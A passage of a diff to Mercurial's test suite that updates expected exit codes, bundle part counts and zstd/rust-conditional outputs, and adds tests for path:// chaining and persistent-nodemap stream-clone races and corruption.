path:d0 + path:d2 + remove these unused includes (yn)? y + looking for local changes to affected paths + deleting data/d0/f.i + deleting data/d2/f.i + deleting meta/d0/00manifest.i (tree !) + deleting meta/d2/00manifest.i (tree !) + $ ls .hg/strip-backup/ + + +Test removing include while concurrently modifying file in that path + $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \ + > --include d0 --include d1 + $ cd narrow-concurrent-modify + $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0 + comparing with ssh://user@dummy/master + searching for changes + looking for local changes to affected paths + deleting data/d0/f.i + deleting meta/d0/00manifest.i (tree !) + not deleting possibly dirty file d0/f diff --git a/tests/test-obsolete-changeset-exchange.t b/tests/test-obsolete-changeset-exchange.t --- a/tests/test-obsolete-changeset-exchange.t +++ b/tests/test-obsolete-changeset-exchange.t @@ -158,11 +158,10 @@ list of changesets: bec0734cd68e84477ba7fc1d13e6cff53ab70129 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 4 parts total + bundle2-output-bundle: "HG20", 3 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "phase-heads" 24 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -174,9 +173,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 1 changesets with 1 changes to 1 files (+1 heads) diff --git a/tests/test-obsolete-distributed.t b/tests/test-obsolete-distributed.t --- a/tests/test-obsolete-distributed.t +++ b/tests/test-obsolete-distributed.t @@ -151,12 +151,11 @@ list of changesets: 391a2bf12b1b8b05a72400ae36b26d50a091dc22 listing keys for "bookmarks" - bundle2-output-bundle: "HG20", 5 parts total + bundle2-output-bundle: "HG20", 4 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload bundle2-output-part: "obsmarkers" streamed payload bundle2-output-part: "phase-heads" 48 bytes payload - bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload bundle2-input-bundle: with-transaction bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported adding changesets @@ -170,9 +169,7 @@ bundle2-input-part: total payload size 143 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 48 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 39 - bundle2-input-bundle: 5 parts total + bundle2-input-bundle: 4 parts total checking for updated bookmarks adding 1 changesets with 1 changes to 1 files (+1 heads) 1 new obsolescence markers diff --git a/tests/test-obsolete.t b/tests/test-obsolete.t --- a/tests/test-obsolete.t +++ b/tests/test-obsolete.t @@ -97,8 +97,10 @@ # rev p1rev p2rev start end deltastart base p1 p2 rawsize totalsize compression heads chainlen 0 -1 -1 0 59 0 0 0 0 58 58 0 1 0 1 0 -1 59 118 59 59 0 0 58 116 0 1 0 - 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 - 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 + 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 (no-zstd !) + 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 (no-zstd !) + 2 1 -1 118 195 118 118 59 0 76 192 0 1 0 (zstd !) + 3 1 -1 195 262 195 195 59 0 66 258 0 2 0 (zstd !) $ hg debugobsolete 245bde4270cd1072a27757984f9cda8ba26f08ca cdbce2fbb16313928851e97e0d85413f3f7eb77f C (Thu Jan 01 00:00:01 1970 -0002) {'user': 'test'} @@ -1844,6 +1846,7 @@ ancestor path: file (node bc7ebe2d260cff30d2a39a130d84add36216f791) other path: file (node b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3) extra: ancestorlinknode = b73b8c9a4ab4da89a5a35a6f10dfb13edc84ca37 + extra: merged = yes We should be able to see the log (without the deleted commit, of course) $ hg log -G @ 0:f53e9479dce5 (draft) [tip ] first diff --git a/tests/test-parse-date.t b/tests/test-parse-date.t --- a/tests/test-parse-date.t +++ b/tests/test-parse-date.t @@ -103,43 +103,43 @@ $ hg log -d "--2" abort: -2 must be nonnegative (see 'hg help dates') - [255] + [10] Whitespace only $ hg log -d " " abort: dates cannot consist entirely of whitespace - [255] + [10] Test date formats with '>' or '<' accompanied by space characters $ hg log -d '>' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '<' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' >' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' <' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '> ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d '< ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d ' > ' --template '{date|date}\n' abort: invalid day spec, use '>DATE' - [255] + [10] $ hg log -d ' < ' --template '{date|date}\n' abort: invalid day spec, use '<DATE' - [255] + [10] $ hg log -d '>02/01' --template '{date|date}\n' $ hg log -d '<02/01' --template '{date|date}\n' diff --git a/tests/test-parseindex2.py b/tests/test-parseindex2.py --- a/tests/test-parseindex2.py +++ b/tests/test-parseindex2.py @@ -117,8 +117,8 @@ ) -def parse_index2(data, inline): - index, chunkcache = parsers.parse_index2(data, inline) +def parse_index2(data, inline, revlogv2=False): + index, chunkcache = parsers.parse_index2(data, inline, revlogv2=revlogv2) return list(index), chunkcache diff --git a/tests/test-patchbomb.t b/tests/test-patchbomb.t --- a/tests/test-patchbomb.t +++ b/tests/test-patchbomb.t @@ -2868,7 +2868,7 @@ dest#branch URIs: $ hg email --date '1980-1-1 0:1' -n -t foo -s test -o ../t#test - comparing with ../t + comparing with ../t#test From [test]: test this patch series consists of 1 patches. @@ -2998,7 +2998,7 @@ bad value setting ----------------- - $ echo 'intro=mpmwearaclownnose' >> $HGRCPATH + $ echo 'intro=oliviawearaclownnose' >> $HGRCPATH single rev @@ -3006,7 +3006,7 @@ From [test]: test this patch series consists of 1 patches. - warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f test foo MIME-Version: 1.0 @@ -3047,7 +3047,7 @@ $ hg email --date '1980-1-1 0:1' -v -t '~foo/bar@example.com' -f 'me*@example.com' -r '10' this patch series consists of 1 patches. - warning: invalid patchbomb.intro value "mpmwearaclownnose" + warning: invalid patchbomb.intro value "oliviawearaclownnose" (should be one of always, never, auto) -f me*@example.com ~foo/bar@example.com MIME-Version: 1.0 diff --git a/tests/test-pathconflicts-basic.t b/tests/test-pathconflicts-basic.t --- a/tests/test-pathconflicts-basic.t +++ b/tests/test-pathconflicts-basic.t @@ -53,7 +53,7 @@ $ hg up file a: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up --clean file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (activating bookmark file) diff --git a/tests/test-pathconflicts-update.t b/tests/test-pathconflicts-update.t --- a/tests/test-pathconflicts-update.t +++ b/tests/test-pathconflicts-update.t @@ -49,7 +49,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -70,7 +70,7 @@ $ hg up dir a/b: untracked file conflicts with directory abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up dir --config merge.checkunknown=warn a/b: replacing untracked file 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -89,7 +89,7 @@ $ hg up file a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up file --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -107,7 +107,7 @@ $ hg up link a/b: untracked directory conflicts with file abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg up link --config merge.checkunknown=warn a/b: replacing untracked files in directory 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-paths.t b/tests/test-paths.t --- a/tests/test-paths.t +++ b/tests/test-paths.t @@ -211,3 +211,177 @@ 000000000000 $ cd .. + +Testing path referencing other paths +==================================== + +basic setup +----------- + + $ ls -1 + a + b + gpath1 + suboptions + $ hg init chained_path + $ cd chained_path + $ cat << EOF > .hg/hgrc + > [paths] + > default=../a + > other_default=path://default + > path_with_branch=../branchy#foo + > other_branch=path://path_with_branch + > other_branched=path://path_with_branch#default + > pushdest=../push-dest + > pushdest:pushrev=default + > pushdest2=path://pushdest + > pushdest-overwrite=path://pushdest + > pushdest-overwrite:pushrev=foo + > EOF + + $ hg init ../branchy + $ hg init ../push-dest + $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5' + $ hg log -G -T '{branch}\n' -R ../branchy + o foo + | + o foo + | + o foo + | + o foo + | + o foo + | + | o default + | | + | o default + | | + | o default + |/ + o default + + + $ hg paths + default = $TESTTMP/a + gpath1 = http://hg.example.com/ + other_branch = $TESTTMP/branchy#foo + other_branched = $TESTTMP/branchy#default + other_default = $TESTTMP/a + path_with_branch = $TESTTMP/branchy#foo + pushdest = $TESTTMP/push-dest + pushdest:pushrev = default + pushdest-overwrite = $TESTTMP/push-dest + pushdest-overwrite:pushrev = foo + pushdest2 = $TESTTMP/push-dest + pushdest2:pushrev = default + +test basic chaining +------------------- + + $ hg path other_default + $TESTTMP/a + $ hg pull default + pulling from $TESTTMP/a + no changes found + $ hg pull other_default + pulling from $TESTTMP/a + no changes found + +test inheritance of the #fragment part +-------------------------------------- + + $ hg pull path_with_branch + pulling from $TESTTMP/branchy + adding changesets + adding manifests + adding file changes + added 6 changesets with 0 changes to 0 files + new changesets 1ea73414a91b:bcebb50b77de + (run 'hg update' to get a working copy) + $ hg pull other_branch + pulling from $TESTTMP/branchy + no changes found + $ hg pull other_branched + pulling from $TESTTMP/branchy + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 0 changes to 0 files (+1 heads) + new changesets 66f7d451a68b:2dc09a01254d + (run 'hg heads' to see heads) + +test inheritance of the suboptions +---------------------------------- + + $ hg push pushdest + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 0 changes to 0 files + $ hg push pushdest2 + pushing to $TESTTMP/push-dest + searching for changes + no changes found + [1] + $ hg push pushdest-overwrite --new-branch + pushing to $TESTTMP/push-dest + searching for changes + adding changesets + adding manifests + adding file changes + added 5 changesets with 0 changes to 0 files (+1 heads) + +Test chaining path:// definition +-------------------------------- + +This is currently unsupported, but feel free to implement the necessary +dependency detection. + + $ cat << EOF >> .hg/hgrc + > chain_path=path://other_default + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + +Doing an actual circle should always be an issue + + $ cat << EOF >> .hg/hgrc + > rock=path://cissors + > cissors=path://paper + > paper=://rock + > EOF + + $ hg id + 000000000000 + $ hg path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + $ hg pull chain_path + abort: cannot use `path://other_default`, "other_default" is also defined as a `path://` + [255] + +Test basic error cases +---------------------- + + $ cat << EOF > .hg/hgrc + > [paths] + > error-missing=path://unknown + > EOF + $ hg path + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + $ hg pull error-missing + abort: cannot use `path://unknown`, "unknown" is not a known path + [255] + diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -2,6 +2,9 @@ Test the persistent on-disk nodemap =================================== + +#if no-rust + $ cat << EOF >> $HGRCPATH > [format] > use-persistent-nodemap=yes @@ -9,6 +12,8 @@ > persistent-nodemap=yes > EOF +#endif + $ hg init test-repo --config storage.revlog.persistent-nodemap.slow-path=allow $ cd test-repo @@ -56,11 +61,12 @@ generaldelta: yes share-safe: no sparserevlog: yes - sidedata: no persistent-nodemap: yes copies-sdc: no + revlog-v2: no plain-cl-delta: yes - compression: zlib + compression: zlib (no-zstd !) + compression: zstd (zstd !) compression-level: default $ hg debugbuilddag .+5000 --new-file @@ -575,17 +581,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: yes no no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) removed: persistent-nodemap processed revlogs: @@ -593,8 +601,17 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + downgrading repository to not use persistent nodemap feature + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' - [1] + 00changelog-*.nd (glob) + 00manifest-*.nd (glob) + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata @@ -611,29 +628,42 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no persistent-nodemap: no yes no copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) added: persistent-nodemap + persistent-nodemap + Speedup revision lookup by node id. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + upgrading repository to use persistent nodemap feature + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n 00manifest-*.nd (glob) 00manifest.n + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata uid: * (glob) @@ -649,7 +679,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) optimisations: re-delta-all @@ -716,20 +747,88 @@ data-unused: 0 data-unused: 0.000% +Test various corruption case +============================ + +Missing datafile +---------------- + +Test behavior with a missing datafile + + $ hg clone --quiet --pull test-repo corruption-test-repo + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + $ rm corruption-test-repo/.hg/store/00changelog*.nd + $ hg log -R corruption-test-repo -r . + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +Truncated data file +------------------- + +Test behavior with a too short datafile + +rebuild the missing data + $ hg -R corruption-test-repo debugupdatecache + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +truncate the file + + $ datafilepath=`ls corruption-test-repo/.hg/store/00changelog*.nd` + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + $ dd if=$datafilepath bs=1000 count=10 of=$datafilepath-tmp status=none + $ mv $datafilepath-tmp $datafilepath + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=10000 (glob) + +Check that Mercurial reaction to this event + + $ hg -R corruption-test-repo log -r . --traceback + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + + + stream clone ------------- +============ The persistent nodemap should exist after a streaming clone +Simple case +----------- + +No race condition + $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) - adding [s] 00manifest.i (313 KB) - adding [s] 00manifest.d (452 KB) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) adding [s] 00changelog.i (313 KB) - adding [s] 00changelog.d (360 KB) - adding [s] 00changelog-*.nd (118 KB) (glob) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n @@ -742,3 +841,212 @@ data-length: 121088 data-unused: 0 data-unused: 0.000% + +new data appened +----------------- + +Other commit happening on the server during the stream clone + +setup the step-by-step stream cloning + + $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1" + $ export HG_TEST_STREAM_WALKED_FILE_1 + $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2" + $ export HG_TEST_STREAM_WALKED_FILE_2 + $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3" + $ export HG_TEST_STREAM_WALKED_FILE_3 + $ cat << EOF >> test-repo/.hg/hgrc + > [extensions] + > steps=$RUNTESTDIR/testlib/ext-stream-clone-steps.py + > EOF + +Check and record file state beforehand + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + test-repo/.hg/store/00changelog.d: size=376891 (zstd !) + test-repo/.hg/store/00changelog.d: size=368890 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320384 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata.txt + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% + +Prepare a commit + + $ echo foo >> test-repo/foo + $ hg -R test-repo/ add test-repo/foo + +Do a mix of clone and commit at the same time so that the file listed on disk differ at actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-1 --debug 2>> clone-output | egrep '00(changelog|manifest)' >> clone-output; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ hg -R test-repo/ commit -m foo + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) + +Check the result state + + $ f --size stream-clone-race-1/.hg/store/00changelog* + stream-clone-race-1/.hg/store/00changelog-*.nd: size=121088 (glob) + stream-clone-race-1/.hg/store/00changelog.d: size=368890 (no-zstd !) + stream-clone-race-1/.hg/store/00changelog.d: size=376891 (zstd !) + stream-clone-race-1/.hg/store/00changelog.i: size=320384 + stream-clone-race-1/.hg/store/00changelog.n: size=70 + + $ hg -R stream-clone-race-1 debugnodemap --metadata | tee client-metadata.txt + uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + data-unused: 0 + data-unused: 0.000% + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + +This isn't the case for the `no-rust` `no-pure` implementation as it use a very minimal nodemap implementation that unconditionnaly rewrite the nodemap "all the time". + +#if no-rust no-pure + $ diff -u server-metadata.txt client-metadata.txt + --- server-metadata.txt * (glob) + +++ client-metadata.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5005 + tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe + data-length: 121088 + [1] +#else + $ diff -u server-metadata.txt client-metadata.txt +#endif + + +Clean up after the test. + + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_1" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_2" + $ rm -f "$HG_TEST_STREAM_WALKED_FILE_3" + +full regeneration +----------------- + +A full nodemap is generated + +(ideally this test would append enough data to make sure the nodemap data file +get changed, however to make thing simpler we will force the regeneration for +this test. + +Check the initial state + + $ f --size test-repo/.hg/store/00changelog* + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + test-repo/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + test-repo/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + test-repo/.hg/store/00changelog.d: size=376950 (zstd !) + test-repo/.hg/store/00changelog.d: size=368949 (no-zstd !) + test-repo/.hg/store/00changelog.i: size=320448 + test-repo/.hg/store/00changelog.n: size=70 + $ hg -R test-repo debugnodemap --metadata | tee server-metadata-2.txt + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-length: 121344 (pure !) + data-length: 121152 (no-rust no-pure !) + data-unused: 192 (rust !) + data-unused: 192 (pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.158% (rust !) + data-unused: 0.158% (pure !) + data-unused: 0.000% (no-rust no-pure !) + +Performe the mix of clone and full refresh of the nodemap, so that the files +(and filenames) are different between listing time and actual transfer time. + + $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-2 --debug 2>> clone-output-2 | egrep '00(changelog|manifest)' >> clone-output-2; touch $HG_TEST_STREAM_WALKED_FILE_3) & + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_1 + $ rm test-repo/.hg/store/00changelog.n + $ rm test-repo/.hg/store/00changelog-*.nd + $ hg -R test-repo/ debugupdatecache + $ touch $HG_TEST_STREAM_WALKED_FILE_2 + $ $RUNTESTDIR/testlib/wait-on-file 10 $HG_TEST_STREAM_WALKED_FILE_3 + $ cat clone-output-2 + adding [s] 00manifest.n (70 bytes) + adding [s] 00manifest-*.nd (118 KB) (glob) + adding [s] 00changelog.n (70 bytes) + adding [s] 00changelog-*.nd (118 KB) (glob) + adding [s] 00manifest.d (492 KB) (zstd !) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) + adding [s] 00manifest.i (313 KB) + adding [s] 00changelog.i (313 KB) + +Check the result. + + $ f --size stream-clone-race-2/.hg/store/00changelog* + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (rust !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121344 (glob) (pure !) + stream-clone-race-2/.hg/store/00changelog-*.nd: size=121152 (glob) (no-rust no-pure !) + stream-clone-race-2/.hg/store/00changelog.d: size=376950 (zstd !) + stream-clone-race-2/.hg/store/00changelog.d: size=368949 (no-zstd !) + stream-clone-race-2/.hg/store/00changelog.i: size=320448 + stream-clone-race-2/.hg/store/00changelog.n: size=70 + + $ hg -R stream-clone-race-2 debugnodemap --metadata | tee client-metadata-2.txt + uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121344 (rust !) + data-unused: 192 (rust !) + data-unused: 0.158% (rust !) + data-length: 121152 (no-rust no-pure !) + data-unused: 0 (no-rust no-pure !) + data-unused: 0.000% (no-rust no-pure !) + data-length: 121344 (pure !) + data-unused: 192 (pure !) + data-unused: 0.158% (pure !) + +We get a usable nodemap, so no rewrite would be needed and the metadata should be identical +(ie: the following diff should be empty) + +This isn't the case for the `no-rust` `no-pure` implementation as it use a very minimal nodemap implementation that unconditionnaly rewrite the nodemap "all the time". + +#if no-rust no-pure + $ diff -u server-metadata-2.txt client-metadata-2.txt + --- server-metadata-2.txt * (glob) + +++ client-metadata-2.txt * (glob) + @@ -1,4 +1,4 @@ + -uid: * (glob) + +uid: * (glob) + tip-rev: 5006 + tip-node: ed2ec1eef9aa2a0ec5057c51483bc148d03e810b + data-length: 121152 + [1] +#else + $ diff -u server-metadata-2.txt client-metadata-2.txt +#endif + +Clean up after the test + + $ rm -f $HG_TEST_STREAM_WALKED_FILE_1 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_2 + $ rm -f $HG_TEST_STREAM_WALKED_FILE_3 + diff --git a/tests/test-phabricator.t b/tests/test-phabricator.t --- a/tests/test-phabricator.t +++ b/tests/test-phabricator.t @@ -48,7 +48,7 @@ options: (use 'hg debugcallconduit -h' to show more help) - [255] + [10] $ hg phabread abort: empty DREVSPEC set [255] diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -757,7 +757,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/store/phaseroots.pending.saved .hg/store/phaseroots.pending (check (in)visibility of phaseroot while transaction running in repo) @@ -780,7 +780,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check that pretxnclose-phase hook can control phase movement @@ -854,12 +854,12 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --public a603bfb5a83e transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ hg phase --draft 17a481b3bccb test-debug-phase: move rev 3: 2 -> 1 test-debug-phase: move rev 4: 2 -> 1 @@ -871,7 +871,7 @@ transaction abort! rollback completed abort: pretxnclose-phase.nopublish_D hook exited with status 1 - [255] + [40] $ cd .. @@ -886,6 +886,8 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -913,6 +915,8 @@ fncache generaldelta internal-phase + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-pull-bundle.t b/tests/test-pull-bundle.t --- a/tests/test-pull-bundle.t +++ b/tests/test-pull-bundle.t @@ -185,7 +185,7 @@ adding changesets adding manifests adding file changes - abort: 00changelog.i@66f7d451a68b: no node + abort: 00changelog.i@66f7d451a68b85ed82ff5fcc254daf50c74144bd: no node [50] $ cd .. $ killdaemons.py diff --git a/tests/test-pull.t b/tests/test-pull-network.t rename from tests/test-pull.t rename to tests/test-pull-network.t --- a/tests/test-pull.t +++ b/tests/test-pull-network.t @@ -81,21 +81,6 @@ abort: unknown revision 'ffffffffffff' [255] -Issue622: hg init && hg pull -u URL doesn't checkout default branch - - $ cd .. - $ hg init empty - $ cd empty - $ hg pull -u ../test - pulling from ../test - requesting all changes - adding changesets - adding manifests - adding file changes - added 1 changesets with 1 changes to 1 files - new changesets 340e38bdcde4 - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - Test 'file:' uri handling: $ hg pull -q file://../test-does-not-exist diff --git a/tests/test-pull-update.t b/tests/test-pull-update.t --- a/tests/test-pull-update.t +++ b/tests/test-pull-update.t @@ -246,3 +246,25 @@ active-before-pull 3:483b76ad4309 $ cd .. + +Issue622: hg init && hg pull -u URL doesn't checkout default branch + + $ hg init test + $ cd test + $ echo foo>foo + $ hg addremove + adding foo + $ hg commit -m 1 + $ cd .. 